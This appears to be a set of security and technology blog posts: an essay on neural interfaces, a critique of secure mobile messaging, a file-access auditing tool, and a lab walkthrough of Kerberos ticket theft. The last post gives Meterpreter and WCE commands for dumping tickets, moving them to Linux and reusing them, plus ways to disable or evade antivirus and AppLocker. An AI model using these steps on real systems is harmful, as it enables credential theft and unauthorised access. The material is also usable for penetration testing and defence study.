The most important innovation of the 21st century

Some innovations have gone down in history as more important than others, transforming whole societies. The steam engine, for example, let us transport people and goods, and power industry with something other than muscle. Antibiotics ushered in the era of modern medicine. Pesticides and food preservatives dramatically increased the availability of food. The invention of the microchip marked the dawn of the information age.

Most curiously, the major innovations have rarely been that significant on their own. Instead they have had catalytic properties, supporting entire fields of science, culture, and economic activity. Most have been improved upon, then discarded in favor of the better versions that came right after them. That has been the major theme of the 21st century: by standing on the shoulders of giants we have constantly been reaching higher and further, improving upon what came before.

It is an exciting time to be alive, because we are slowly beginning to understand what we do not know, and the rate at which we gather information is accelerating to breakneck speed. Indeed, we have hit a plateau where we see thousands of things but have no way of determining what is significant and what is not.

Luckily, I happen to know what will go down in the pages of history as the most important innovation of the 21st century. It is the one that allows us to stay on top of the information wave, provides endless new angles on the human mind, acts as a catalyst for solving the issues of the 21st century (war, famine, disease, pollution, greed, etc.), and makes effective immortality a reality.

I am talking about direct neural interfaces, and specifically the upcoming consumer applications.

The play on human senses

You reading this, and experiencing what you experience right now, is not really that complex. It is all just tiny electrical impulses, assisted and partly caused by chemistry.

Interfacing directly with a sufficient number of human nerves allows substituting the nerve inputs from our sensory organs with a virtual reality experience that we are unable to distinguish from real life. This opens up several possibilities in education.

Take professions requiring long training before reaching sufficient proficiency in motor, judgment, and other mental skills. A good example would be a surgeon. With a direct neural interface it will be possible to record what an expert perceives, how the tools feel when operated masterfully, and to play it all back to a novice. Instead of a pale description, sharing performances indistinguishable from reality would allow accelerated paths toward expertise. Getting a new type of feedback on one's activity, being able to compare and correct constantly against a master, would be magnificently efficient.


People working in dangerous occupations would be allowed to screw up in training without major consequences. Soldiers, police, and firefighters, for instance, could test new tactics. In the event of their deaths they would be able to reflect on the experience, get the viewpoint of their adversaries played back to them, and retry the operation ad nauseam until getting their actions right.

This would drastically increase the availability of certain types of skilled workers, make their skills superior, and shorten the unproductive periods of learning. The impact on societies would be profound. But that is not all, as the salesmen like to say.

What if Hollywood made Mission: Impossible 5 so that you would actually see and feel everything Ethan Hunt does? That is all just a few terabytes of data to be streamed into your neural pathways, and entirely doable. The power of that experience would transform the entertainment industry forever.


Medicine is another field that will gain a lot from direct neural interfaces. Replacing lost limbs with something that feels and actually works is a noble cause, and it is already done to some extent. Some legs, hands, and even a few eyes are already functional, although at a very basic level. One day the replacement parts will be better than the originals, and we will notice that there might be reasons besides losing limbs for replacing them. Enhancing human senses by adding new sensory organs, or limbs tailored for specific tasks, can open endless possibilities.


And what about just building user interfaces for everyday stuff to improve the quality of everyday life? Even passive listening would make ubiquitous computing so much easier to implement. It is hard enough to anticipate the wishes of a human being from external cues; being able to take the internal state into account would certainly help. Until that is possible, I fear we will mostly keep seeing random hits and misses in the success of ubiquitous computing.

Towards higher intelligence

Extending the human mind requires a bit more than playing around with our senses. It is, however, also doable with direct neural interfaces.

Think about something mundane. Say, a banana. What color is it? You instantly know the answer, and recognize that it is usually true. It is not like you thought with a booming voice in your mind “GOOGLE BANANA COLOR”, as you would likely do with our present personal knowledge assistants. What happened was a search for the keys to the information, and then a retrieval. We know whether we know things, even before we actually recall them. Then a mysteriously effortless process produces the results for us. Usually, that is, because we are not perfect.

Direct neural interfacing would make it possible to produce the “keys” and the “information” (this is close to the models of cognitive psychology) for everything we come up with, without us noticing anything. Like spooky action at a distance, we would know everything that is searchable in digital libraries such as Wikipedia, given they were indexed and prepared properly. Now think about how much more effectively a person like that could solve real-life problems, go through variations of theories, and synthesize new solutions. In several areas of human life that would change everything, although staying sane would probably require implementing some safeguards.

Moving further, how about instant skills, downloaded straight to parts of your brain? This time not just impressions of someone doing something, but the actual skills directly! The thing seen in the Matrix movies is not as far out as one might believe. Again, not overloading our brainpans would be a minor issue, but training neural pathways is just a matter of generating the correct stimuli, and thus solvable. Skills here would naturally include complex thoughts, such as theories of modern quantum physics, and other constructs.


The previous gives a new meaning to the old saying “to stand on the shoulders of giants”. Instead of pieces of data it will be possible to teach the way those giants actually thought about the matters, the processes they used to come to their conclusions, and the complete mindsets behind the issues. And it would not be just a description, but exactly how the giants saw the issues. That would allow continuing the work on top of all that knowledge and wisdom even after the original giant is gone.

Thus, we are getting close to describing a catalyst that can be used to solve the issues of the 21st century. By simply moving mental processing to a new level, we can solve what we choose. The ability to master several fields of study simultaneously and synthesize between them, nearly limitless availability of facts, and the trainability of the methods of effective thinking are sure to slingshot the productivity of every R&D type activity into the stratosphere.

Melding towards immortality

Nothing expels monsters like a beam of light. Nothing expels racism, bigotry, and prejudice like information: information about another person, their point of view, and how they feel. That is what might be possible in the future – playing one person’s mindset back to another. That would show each one of us that we are the same, and profoundly change how we act towards each other. We cannot hurt ourselves; it would be insanity towards ourselves. And that is what would change our world, if it were made available for everyone to experience.


How about sharing thoughts live, then? That is certainly possible. Instead of talking with each other, we could send each other what would seem like a stream of feeling fragments, thought constructs, and memories. Semantic, truly accurate, perfectly understandable communication is something we presently lack. We approximate even our most complex thoughts with crude sounds, transmit them by archaic methods, lacking parts of the context, and the other party has to attempt to grasp the meaning from that, usually failing to some degree. It is a wonder that humanity made it out of the bronze age, come to think of it.

Thinking together with another person will be the next step. Consider what happens when you join five ordinary people who share the goal of solving a common problem. If they are disciplined enough to adhere to certain rules, their combined thinking power might actually make them more than they are, and solve issues humans are simply not smart enough to deal with on their own. And as I have pointed out several times already, most innovations happen when things from surprising areas are synthesized together. So why not think together with something entirely different, say a computer, as well.


That brings us to the issue of immortality. We are our thought processes. Those are mostly electrical impulses (although extremely complex ones). If we can be recorded and uploaded, and we can think with other people (or machines), what demands that we think inside our own heads? The answer, probably after considerable refining of the idea, is nothing at all. Moving ourselves to new platforms when our physical shells get damaged or too old should not be too challenging. It is, after all, just a continuation of everything I have described previously, meaning that effective immortality is within our grasp.

Blue ocean

The funny thing is, there is a lot of work being done to improve human-computer interaction. Some of this work is reaching for direct neural interfaces without even realizing it. Take Oculus VR, Google Glass, or smartphones with all their features, for example. In a couple of decades we will look at all of that with a nostalgic smile. The cool kids are already working towards the better stuff, but they lack the complete vision and the goal of full spectrum dominance. Taking that stuff out of the laboratories is the key to success.

That’s the ironic part. It takes a lot of money to develop this stuff to an actual consumer product stage. Fewer than 50 companies in the world might have the necessary resources. The required technologies would all be patentable, and potentially worth trillions of dollars in technology licensing fees. After all, nearly every industry and field of economic or cultural activity stands in queue to utilize them. A couple billion mobile devices and a billion personal computers to replace. A few dozen billion ubiquitous appliances to enhance. There is a perfect blue ocean situation here. Heck, it’s more like a water world.


Even though there are early demonstrators, and other reasons to believe all of this is possible, there is still no massive investment. Everyone wants to see someone else go first. The larger the company, the more careful it tends to be. They got big somehow, and they are trying to stay big, so avoiding risks is rewarded. Let the smaller ones take the risks and, as is common nowadays, buy them out before they become challengers. Ha. So, the investment is clearly out of the question. Even though the prize is trillions of dollars. Baffling. Sad. Ironic.

My motivation here is pretty simple. I am writing this in the hope that I get to say “what did I say” in my lifetime. If I get any chance to invest in what I have described, I will jump in. I know it is the holy grail of the 21st century. If I get a chance to work on a project dealing with this stuff, I will jump at it instantly. And if I get to talk with a VC brave enough, with a few billion dollars to spare, I will try to convince them that my vision is correct.

How (not) to build a secure mobile messaging platform

Lately there has been a noticeable effort towards secure mobile messaging platforms. There are simply too many to even start listing them. Most nation states seem to be working to obtain one, with or without commercial partners. Products come and go. So far I have not seen one that touches the fundamental problem: there is a difference between mass surveillance and being actually targeted by a state level aggressor. This is a post about a few things you would have to take into account when the game was not only about mass surveillance.

Hardware architecture

The biggest issue with just taking some generic reference hardware and slapping a hardened Android on it is the architecture: alongside the application processor sits a separate communications processor, and the two share access to the same hardware.

The hardening usually focuses on what is referred to as the application processor, which runs the main operating system. The communications processor is ignored, although it is significant for several reasons:

  • It is actively in contact with the phone network
  • It is not simple – some tasks require complex logic and serious computing power
  • Some of those tasks include adjusting operations to the feedback given by the network base stations
  • The architecture allows it to bypass the application processor and independently access sources of potentially interesting information – for instance the microphone
  • Malign activities done by the communications processor can be made mostly invisible to the other components
  • It does offer an attack surface for parties with resources to hack the common chipsets
  • Some or most of these chips are black boxes to the vendors using them

As a result, if you are using an encrypted VOIP service while someone has control of the communications processor, listening in on the conversation via a side channel is both possible and undetectable. This is not a theoretical threat either. Let’s take a historical device, the Nokia 3310, for instance.


A few models in that line had a network monitoring firmware. On at least those models you could command the application processor to power off independently. After that you could call the phone with special codes, and the communications processor would answer the call and let you listen to everything around it. The phone looked completely dead to the user. Taking a device that has even a chance of functioning like that into any secure working area is a huge risk!

The point here is that hardening only the application processor is a major gap. I am not saying that the most common phones nowadays have security vulnerabilities or backdoors in their communications processors. What is significant is that the hardware architecture of modern phones was never designed for security. Every single component is treated as trustworthy. At least the ones facing the network should be properly sandboxed, but they are not!

It should be noted that secure sourcing is hard. Remember the images of the NSA intercepting hardware shipments to modify them before they reach customers.


A proper architecture that would not implicitly trust every component would at least require meddling with several components in the supply chain, making the option less attractive and harder to pull off. Some of the commonly exploited basic cases might prove impossible. Defensive architecture really could level the playing field.

Other interfaces

Let’s say the mobile device had a perfect encrypted VOIP solution. It was completely audited, and accredited for use. You could go into hostile network environments and communicate securely from there, without any fear of incidents. The encryption was heavy duty enough to protect even the most precious state secrets for the required 50+ years.

Then someone bought a cheap Bluetooth headset and paired it with the mobile device. An eavesdropper staying within 500 meters or so could listen in on the connection and take a jab at an encryption scheme that is several orders of magnitude easier to attack. While not outright broken, those features were never designed for securing really classified communications; they were designed for the consumer market. Also, nearly every implementation allows downgrading the protocol version by default, because consumers want their devices to just work.

Now you would be running the risk of an information leak. Alternatively, you would have to audit and accredit the Bluetooth chip, with its settings and all, and the client devices – at an immense cost. Depending on the mandated requirements for encryption and key management, that might even prove impossible. Or you would have to disable the features altogether, in a secure fashion. Multiply this by however many similar interface features the mobile device offers. The answer is probably: many.

Users have a hard time accepting that several expected features of a mobile phone are disabled, while the pointy haired bosses wish to keep the costs down. One way to meet in the middle might be allowing some devices while the user is not working with secured connections, and dropping everything while a secure mode is on. But even that requires a certain level of guarantee that nothing coming in via those interfaces can have a permanent effect. This is something not even the NSA’s recommendations take properly into account.
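
As a very rough sketch of what “dropping everything” could look like on a Linux-based device – assuming the radios are exposed through the standard rfkill interface, which baseband-controlled radios may well not be – entering and leaving a secure mode might boil down to:

# Entering secure mode: soft-block all secondary radio interfaces
rfkill block bluetooth
rfkill block wifi
rfkill block nfc

# Leaving secure mode
rfkill unblock bluetooth
rfkill unblock wifi
rfkill unblock nfc

Note that a soft block is exactly the kind of guarantee we do not actually have: a compromised controller is free to ignore it.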

Trust models

Now here’s the issue. The cryptographic algorithms are just one part of encryption. Once the basics are laid out correctly, key management becomes the more important part, and the primary attack surface of the encryption. Probably no one is stupid enough to challenge, say, ECDHE-ECDSA-AES256-GCM-SHA384, when you can just look for weaknesses in how the keys are produced, transported, and used.
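
To underline the point, here is how little of the work the algorithms themselves represent. A minimal sketch in Python, using the third-party cryptography library (illustrative only, not taken from any product mentioned here):

# Minimal sketch: ephemeral X25519 key agreement plus HKDF key derivation.
# The algorithms are the easy part; everything around them is the attack surface.
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

alice_priv = X25519PrivateKey.generate()   # ephemeral, this session only
bob_priv = X25519PrivateKey.generate()

# Both sides derive the same shared secret from the other's public key
shared = alice_priv.exchange(bob_priv.public_key())
assert shared == bob_priv.exchange(alice_priv.public_key())

# Derive the actual session key from the shared secret
session_key = HKDF(algorithm=hashes.SHA256(), length=32,
                   salt=None, info=b"messaging session").derive(shared)

Everything that actually gets attacked is absent from these lines: how the peer’s public key was obtained, who vouched for it, and where the private keys are stored.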

Interestingly, the requirements of private users and larger organizations (government agencies, large corporations) differ here. The organizations want a full-blown PKI, because they need the flexibility and the management features, and the solutions aimed at that audience usually offer all of it. Private users, well – they would rather not trust external CAs, whether because of implementation issues or on principle. For many, the principle is probably the most significant issue.

After all, if a CA can screw users over by, for instance, generating secondary certificates with their identities, why would a citizen who does not trust his government trust a CA run by that same government? Why would he trust any commercial CA that can be influenced by that government? Such a user might be better off with something less centralized. Ideally, if you cannot trust PKI systems, things should work more like key signing parties, where you meet people, authenticate them, and cross-sign your keys. Halfway solutions like Silent Circle are, however, probably more convenient.
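
A sketch of the decentralized end of that spectrum, using only the Python standard library: derive a short fingerprint from a public key, and let the users compare the fingerprints in person or over another channel – the same idea as PGP fingerprints.

# Sketch: a human-comparable fingerprint of a public key.
# Grouped hex digits of a SHA-256 hash, similar in spirit to PGP
# fingerprints or "safety numbers".
import hashlib

def fingerprint(public_key_bytes: bytes) -> str:
    digest = hashlib.sha256(public_key_bytes).hexdigest()[:32]
    return " ".join(digest[i:i+4] for i in range(0, len(digest), 4))

# Both parties run this on the key they *believe* belongs to the other,
# then compare the resulting strings face to face.
print(fingerprint(b"\x04" + b"\x42" * 64))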

Any secure mobile messaging platform that wishes to gain considerable market penetration would probably have to offer both models simultaneously, and let the users choose.

Identification and key management

It is clearly insufficient to identify only the mobile device before trusting the other party with information. That is where strong electronic identification comes into play as the gold standard of user authentication. Basically it stands for 2-factor authentication, combining “what you have” and “what you know” to determine the identity.

However, some alternatives fail spectacularly on mobile devices. Mobile certificates and other locally installed certificates are roughly as useful as the classic ident system. At best they make a nice Douglas Adams style skit in which the device tries to figure out whether it actually has the certificate file that it has, and whether it can detect tampering done to itself. (It cannot; that way lie chicken-and-egg problems.)

What is required is an HSM, providing cryptographic services to the system while guaranteeing that the private keys cannot leak. Until something like that is available to mitigate the risks related to key storage, building a secure mobile messaging platform is a slightly dubious idea. To my knowledge, the current architecture of common mobile devices lacks HSM functionality. That may change, however, because there is a considerable push for enabling mobile payments, which ultimately requires solving the same problem.
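
The essential property fits in a few lines. The class below is a pure software stand-in, written for illustration only and resembling no real HSM API: callers can request signatures, but there is no code path for extracting the key.

# Software stand-in for the HSM idea: the private key is created inside
# the module and only signing operations are exposed. A real HSM enforces
# this boundary in tamper-resistant hardware, not with Python visibility.
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

class ToyHSM:
    def __init__(self):
        self.__key = Ed25519PrivateKey.generate()  # never serialized out

    def public_key(self):
        return self.__key.public_key()

    def sign(self, message: bytes) -> bytes:
        return self.__key.sign(message)

hsm = ToyHSM()
challenge = b"challenge from the authentication server"
signature = hsm.sign(challenge)
hsm.public_key().verify(signature, challenge)  # raises if invalid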

The role could also be fulfilled by a commercial token, or by one of the most common HSMs on this planet: the chip on a payment card.


Consider a chip-only direct debit card: it has no magnetic stripe, the printed number series are informational only, and the chip works as an HSM. To exploit it, an attacker most commonly needs both the PIN (“what you know”) and the physical card itself (“what you have”). While cloning the chip, including the encrypted data, is possible, there have been no attacks based on that in the wild. The security model around the smart card is actually surprisingly solid. Phones just lack the reader hardware.

Availability, the quality of keys and key management, pricing, and ease of use all currently work against building a truly secure mobile messaging platform. Most solutions I have seen so far rest, at the end of the day, on the strength of user passwords and on unwavering trust in the components of the application.

Layering issues

Let’s take two different approaches to secure mobile messaging. The first is to use whatever VOIP solution and slap an ordinary VPN product on top of it. The other is to build an integrated end-to-end encrypted messaging stack. The security profiles of these two types of solutions are significantly different.

Take the following issues for example:

  • How can the VPN credentials and the credentials to the services be enforced to be the same and irrefutable?
  • Once the VPN credentials are lost, what kind of attack surface do the services offer, compared to a more integrated solution with end-to-end encryption?
  • Was the VOIP system actually designed to be secure by itself? Or is the vendor just slapping pieces of mediocre applications together, building complexity against auditors?
  • If the VOIP system has security features such as encryption, why are they not good enough to stand on their own? Why is the VPN required at all?
  • How much information does the VPN solution leak for side channel attacks?
  • If the centralized parts of the messaging platform are (partially) compromised, have all the messages leaked? Would an end-to-end system prove at least somewhat more resilient?

If nothing else, the VPN based solution is significantly more complex because of the loose coupling of the layers. Sketching a simple sequence diagram of all the key management and encryption related activity during the use of the messaging platform proves this instantly. Likewise, the risk of simply screwing up a detail is several magnitudes higher. From a complexity standpoint, mixing common VPN tools with what started off as a relatively simple messaging system is instinctively a very bad idea.
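
A crude, caricature-level version of that diagram already makes the point:

VPN-layered:   client -> VPN gateway      credentials #1, key exchange #1
               client -> VOIP/IM server   credentials #2, key exchange #2
               server -> recipient's VPN  credentials #3, key exchange #3
               (plaintext exists at every point where a layer terminates)

End-to-end:    client -> recipient        one identity, one key exchange
               (intermediaries only relay ciphertext)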

About that complexity

Android alone is about 13 million SLOC. The hardware components handling communications, audio processing, accessories, and so on probably add a few million lines more. That is a lot of Java, C/C++, and more niche languages to audit and accredit for security. Too much, actually – and several features allow pulling in code dynamically from external sources. Take browser plugins, for example…

To be honest, I would rather have something entirely stupid but thoroughly auditable, and audited, for secure messaging. It is okay to have a separate “recreational” phone and another one for the serious tasks. Even a nasty TETRA phone like the Motorola MTH800 is probably too complex.


That, however, is where the problems begin. It is hard, especially for decision-makers, to understand the value of simplicity when it comes to security. After all, their 12-year-old kids seem to be doing just fine with all the gadgets, and the gadgets constantly come with promises of security.

Again, I am not saying there are known major vulnerabilities with the alternative. I am saying that I like the risk profile of going KISS more when the security really counts.

Conclusion

In my humble opinion we are still several evolutions away from any hope of building truly secure mobile messaging platforms. While some solutions are actually doing alright against lower level adversaries, most have architectural problems that become significant when state level aggressors enter the game.

The main issue is that there are too many unchecked components in the present hardware platforms. There is no real security architecture either: several important elements, such as sandboxing of critical components and HSM modules for key storage, are missing. User identification will remain slightly unsatisfactory in the near future, and several of the solutions marketed as secure are scarily complex. The solution would be to redesign the basics from an entirely different viewpoint.

My dream would be to get some actual hardware developers to work on this, and to get, for instance, the OpenBSD folks to build the software layer from the ground up. Make the foundation preferably open source, to benefit all. That will probably never happen, though, because most target audiences are simply happy with commercial grade security features. I fear there just is not enough support to warrant the use of the resources. Furthermore, the phone could probably never be sold in some countries, because the authorities would not certify it for sale.

On auditing file usage

Since the time of the Orange Book in the 80s, three rules have been irreplaceable in IT security: always check access rights, audit all information usage, and never let information leave the secure domain in an uncontrolled fashion. A proper mixture of authorization, stalking user activity, and limiting the available tools still works nowadays, when implemented properly.

In the major leaks of the last few years, all of the above failed. The users had bafflingly broad access rights to information, not everything was audited, and it was fairly easy to move information outside the secured domain. As a result, leaking was attractively easy, and getting caught was unlikely.

A while ago I took a look, out of curiosity, at products meant for file access auditing. Those would be the solutions that fix the “audit all information usage” part when customizing the information systems themselves is not possible (COTS). I found a surprising number of products with different feature sets and value propositions. A few had pretty steep price tags and fairly advanced features.

Based on what I found, I got excited about developing my own basic version, just to maintain my own skills and for the heck of it. After a few hours of reading MSDN, nerve-wracking C/C++ development, and jury-rigging, it’s here. The quality is so-so (it might have some memory leaks, although I tried to catch them all) and I had no precise specifications, but here is Claimsman:

https://github.com/mikkolehtisalo/claimsman

With the solution, all file accesses cause events that are forwarded to a centralized log management system. I did not implement hashing the files or taking samples, because those activities would probably have a noticeable performance impact on the target, but adding that would be trivial. Out of the box, the events show up in the default log management interface.

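To give an idea of the data involved, a single access event could look roughly like this – the field names here are purely illustrative, not necessarily Claimsman’s actual schema:

{
  "timestamp": "2015-06-25T11:02:44Z",
  "host": "WORKSTATION-042",
  "username": "EXAMPLE\\alice",
  "filename": "C:\\Projects\\Classified\\budget.xlsx",
  "access": "write"
}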

Once the information is in the centralized log management system, it is relatively easy to generate, for instance, a weekly report of all file accesses. In conjunction with AD it is possible to look up the manager information, run everything through a good PDF template generator, and email the reports, so that every manager gets a weekly report of all the files their subordinates have been working on.
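
The reporting side needs nothing fancy. A minimal sketch in Python, assuming the week’s events have been exported as newline-delimited JSON with the hypothetical fields shown above (the AD manager lookup and the PDF generation are left out):

# Sketch: weekly per-user file access summary from exported log events.
# Assumes newline-delimited JSON with "username" and "filename" fields.
import json
from collections import defaultdict

def weekly_report(path: str) -> dict:
    accesses = defaultdict(set)
    with open(path, encoding="utf-8") as events:
        for line in events:
            event = json.loads(line)
            accesses[event["username"]].add(event["filename"])
    return accesses

for user, files in sorted(weekly_report("week25.json").items()):
    print(f"{user}: {len(files)} distinct files")
    for name in sorted(files):
        print(f"    {name}")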

Once knowledge of such an arrangement spread, it would discourage people from even attempting suspicious activities in environments where material of higher classification is processed. In the long run, the impact on overall security would be far more significant than the technical feature itself. The tools of IT security work at their best when they have a psychological impact. Absurd, but true. It is not always best to turn all the technical knobs to 11.

On the other hand, some concessions probably have to be made to ensure the privacy of the users. At least in lower security level environments this issue may arise, because in many jurisdictions employees commonly have limited rights to use the employer’s tools for private business, such as accessing their personal banking during lunch break.

Windows Kerberos ticket theft and exploitation on other platforms

Introduction

In the past there has been a lot of talk about pass the hash, but surprisingly little about the different methods for exploiting Kerberos tickets. Apart from the discussion around golden tickets, Kerberos has never really been a major target for abuse.

I decided to take a look at how Kerberos tickets can be dumped from a Windows target and re-used on Linux. It was surprisingly easy to accomplish.

Prerequisites

The following are required for this approach:

  • A Meterpreter session on the Windows target, with sufficient (system level) privileges
  • The Windows Credentials Editor (WCE) for dumping the tickets
  • A Linux machine with MIT or Heimdal Kerberos tools, and network access to the target domain

This post focuses on manipulating the tickets and Kerberos, and omits less relevant parts.

Ticket theft

Upload the WCE and run it:

meterpreter > upload wce.exe
[*] uploading : wce.exe -> wce.exe
[*] uploaded : wce.exe -> wce.exe
meterpreter > execute -f wce.exe -i -H -a "-K"
Process 604 created.
Channel 2 created.
WCE v1.42beta (X64) (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Converting and saving TGT in UNIX format to file wce_ccache...
Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
5 kerberos tickets saved to file 'wce_ccache'.
5 kerberos tickets saved to file 'wce_krbtkts'.
Done!

Download wce_ccache for use with MIT or Heimdal Kerberos. It is in fact a credentials cache file that just has to be copied into place after some basic configuration. In case you are wondering, wce_krbtkts is for Windows, and can be imported into another Windows instance with WCE (with the -k option).

meterpreter > download wce_ccache
[*] downloading: wce_ccache -> wce_ccache
[*] downloaded : wce_ccache -> wce_ccache

Setting up

The following steps are required to configure a Linux platform for “joining” the Windows Kerberos realm.

1. Make sure the clocks are synchronized. Kerberos challenges fail if the clock difference is more than 5 minutes. Find out the remote time and date:

meterpreter > execute -i -f cmd.exe -a "/C echo %TIME% %DATE%"
Process 2140 created.
Channel 10 created.
23:14:32,90 to 25.06.2015

You can either change the local time manually (for temporary use), or configure ntpd to synchronize the time from the domain controllers.
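
For instance, to set the clock manually to match the output above (GNU date syntax; the exact format varies by system):

date -s "2015-06-25 23:14:32"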

2. Make sure you have the Kerberos tools installed. Kali Linux, for instance, does not include them by default, and you have to install them:

apt-get -y install krb5-user

3. You want to use the target domain’s DNS server to be able to access the service records:

meterpreter > execute -i -c -f ipconfig.exe -a "/ALL"
Process 2620 created.
Channel 15 created.
-- snippetysnap
 DNS Servers . . . . . . . . . . . : 192.168.122.89

Test that you can resolve names from the domain’s DNS service, because Kerberos is really bent on utilizing DNS:

# cat /etc/resolv.conf
nameserver 192.168.122.89
# nslookup
> WIN-55NRNN3SRQ4.hacknet.x
Server: 192.168.122.89
Address: 192.168.122.89#53
Name: WIN-55NRNN3SRQ4.hacknet.x
Address: 192.168.122.89

4. Find the KDC, the domain name, and the NETBIOS name. There are several ways to accomplish this, for example:

meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
 --- ---- ---- ---- ------- ---- ----
 2472 1188 cmd.exe x86_64 1 HACKNET\user C:\Windows\System32\cmd.exe

meterpreter > migrate 2472
[*] Migrating from 2692 to 2472...
[*] Migration completed successfully.
meterpreter > execute -i -f cmd.exe -a "/C set"
LOGONSERVER=\\WIN-55NRNN3SRQ4
USERDNSDOMAIN=HACKNET.X

5. Use the previous information to create a valid Kerberos configuration file /etc/krb5.conf:

[libdefaults]
    default_realm = HACKNET.X
    krb4_config = /etc/krb.conf
    krb4_realms = /etc/krb.realms
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
    v4_instance_resolve = false
    v4_name_convert = {
        host = {
            rcmd = host
            ftp = ftp
        }
        plain = {
            something = something-else
        }
    }
    fcc-mit-ticketflags = true

[realms]
    HACKNET.X = {
        kdc = WIN-55NRNN3SRQ4.hacknet.x:88
        admin_server = WIN-55NRNN3SRQ4.hacknet.x
        default_domain = hacknet.x
    }

[domain_realm]
    .hacknet.x = HACKNET.X
    hacknet.x = HACKNET.X

[login]
    krb4_convert = true
    krb4_get_tickets = false

6. Copy the credentials cache file and query for tickets:

# klist
klist: No credentials cache found (ticket cache FILE:/tmp/krb5cc_0)
# cp wce_ccache /tmp/krb5cc_0
# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: HACKCLIENT$@HACKNET.X
Valid starting    Expires           Service principal
23/06/2015 20:43  24/06/2015 06:43  krbtgt/HACKNET.X@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  krbtgt/HACKNET.X@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  krbtgt/HACKNET.X@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  cifs/WIN-55NRNN3SRQ4.hacknet.x@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  HACKCLIENT$@HACKNET.X
renew until 30/06/2015 20:43
23/06/2015 20:43  24/06/2015 06:43  LDAP/WIN-55NRNN3SRQ4.hacknet.x/hacknet.x@HACKNET.
renew until 30/06/2015 20:43

Using

Let’s take a web service that uses GSSAPI/Kerberos authentication. When accessed without a working configuration, it will respond bluntly with a 401. Luckily, after the previous configuration steps all that has to be done is to configure Firefox to attempt GSSAPI/Kerberos authentication for this domain. After that, accessing the service with the credentials taken from Windows succeeds.
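
In Firefox this means opening about:config and adding the domain to the preference that whitelists sites for Negotiate (GSSAPI/Kerberos) authentication:

network.negotiate-auth.trusted-uris = hacknet.x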

The required configuration differs for other applications. For instance, accessing CIFS shares requires the sec=krb5 mount option.
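
For example, something along these lines – the share name here is made up, and the Kerberos upcall of cifs-utils has to be in place for sec=krb5 to work:

mount -t cifs //WIN-55NRNN3SRQ4.hacknet.x/share /mnt/share -o sec=krb5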

Potential issues

Mismatching configurations

Kerberos is somewhat unforgiving about configuration issues. If, for instance, the supported encryption types do not match, the authentication challenges will fail. The slightest problem with DNS, or too much clock skew, and the authentication challenges again fail. Most applications fail to report the actual reason to the user, so debugging may be required.

The following environment variables will make Firefox write an extensive debug log:

export NSPR_LOG_MODULES=negotiateauth:5
export NSPR_LOG_FILE=/tmp/moz.log

The following environment variable will make krb5-libs write a trace log:

export KRB5_TRACE=/tmp/krb.log
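
For example, requesting a service ticket with kvno while tracing is a quick way to see each step of the exchange:

KRB5_TRACE=/tmp/krb.log kvno cifs/WIN-55NRNN3SRQ4.hacknet.x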

No suitable credentials

As we saw in the example, there are several credentials for different purposes. Some are used for authenticating the computer to the domain services, some for authenticating the user for logon, and most work only against a specific Service Principal Name. In practice that means you can sometimes access only what a logged on user has recently accessed.

That is why Ticket Granting Tickets exist. If your setup has been configured correctly, missing tickets will be requested from the domain based on the previous authentication done against it. If this fails, you have to debug your configuration as instructed above.

Antivirus software & AppLocker

Both antivirus software and AppLocker can prevent WCE from running. Since you probably have system level privileges anyway, you can simply disable those features. An alternative is to execute WCE from memory. Meterpreter offers an option for that:

execute -H -m -d calc.exe -f wce.exe -a "-K"

It has however been reported that WCE might still touch the disk by temporarily writing a DLL. In case that is unacceptable, a method exists to use the alternative utility Mimikatz.

Discussion

The demonstration does not mean that Kerberos is broken. Not at all. It does not provide an initial attack vector, and the potential methods of protection would likely have negative side effects. For instance, limiting the source hosts for tickets would hinder network roaming – not a very good idea for mobile users.

The past golden ticket vulnerability required a similar theft of keys, but it was also worsened by a design flaw in the Windows KDC’s handling of keys.

Another possible trick is simply to have the target proxy the requests to services. The idea is that the computer holding an actual valid Kerberos ticket proxies the requests on behalf of the attacker while responding to the challenges. This requires special software that is likely application specific.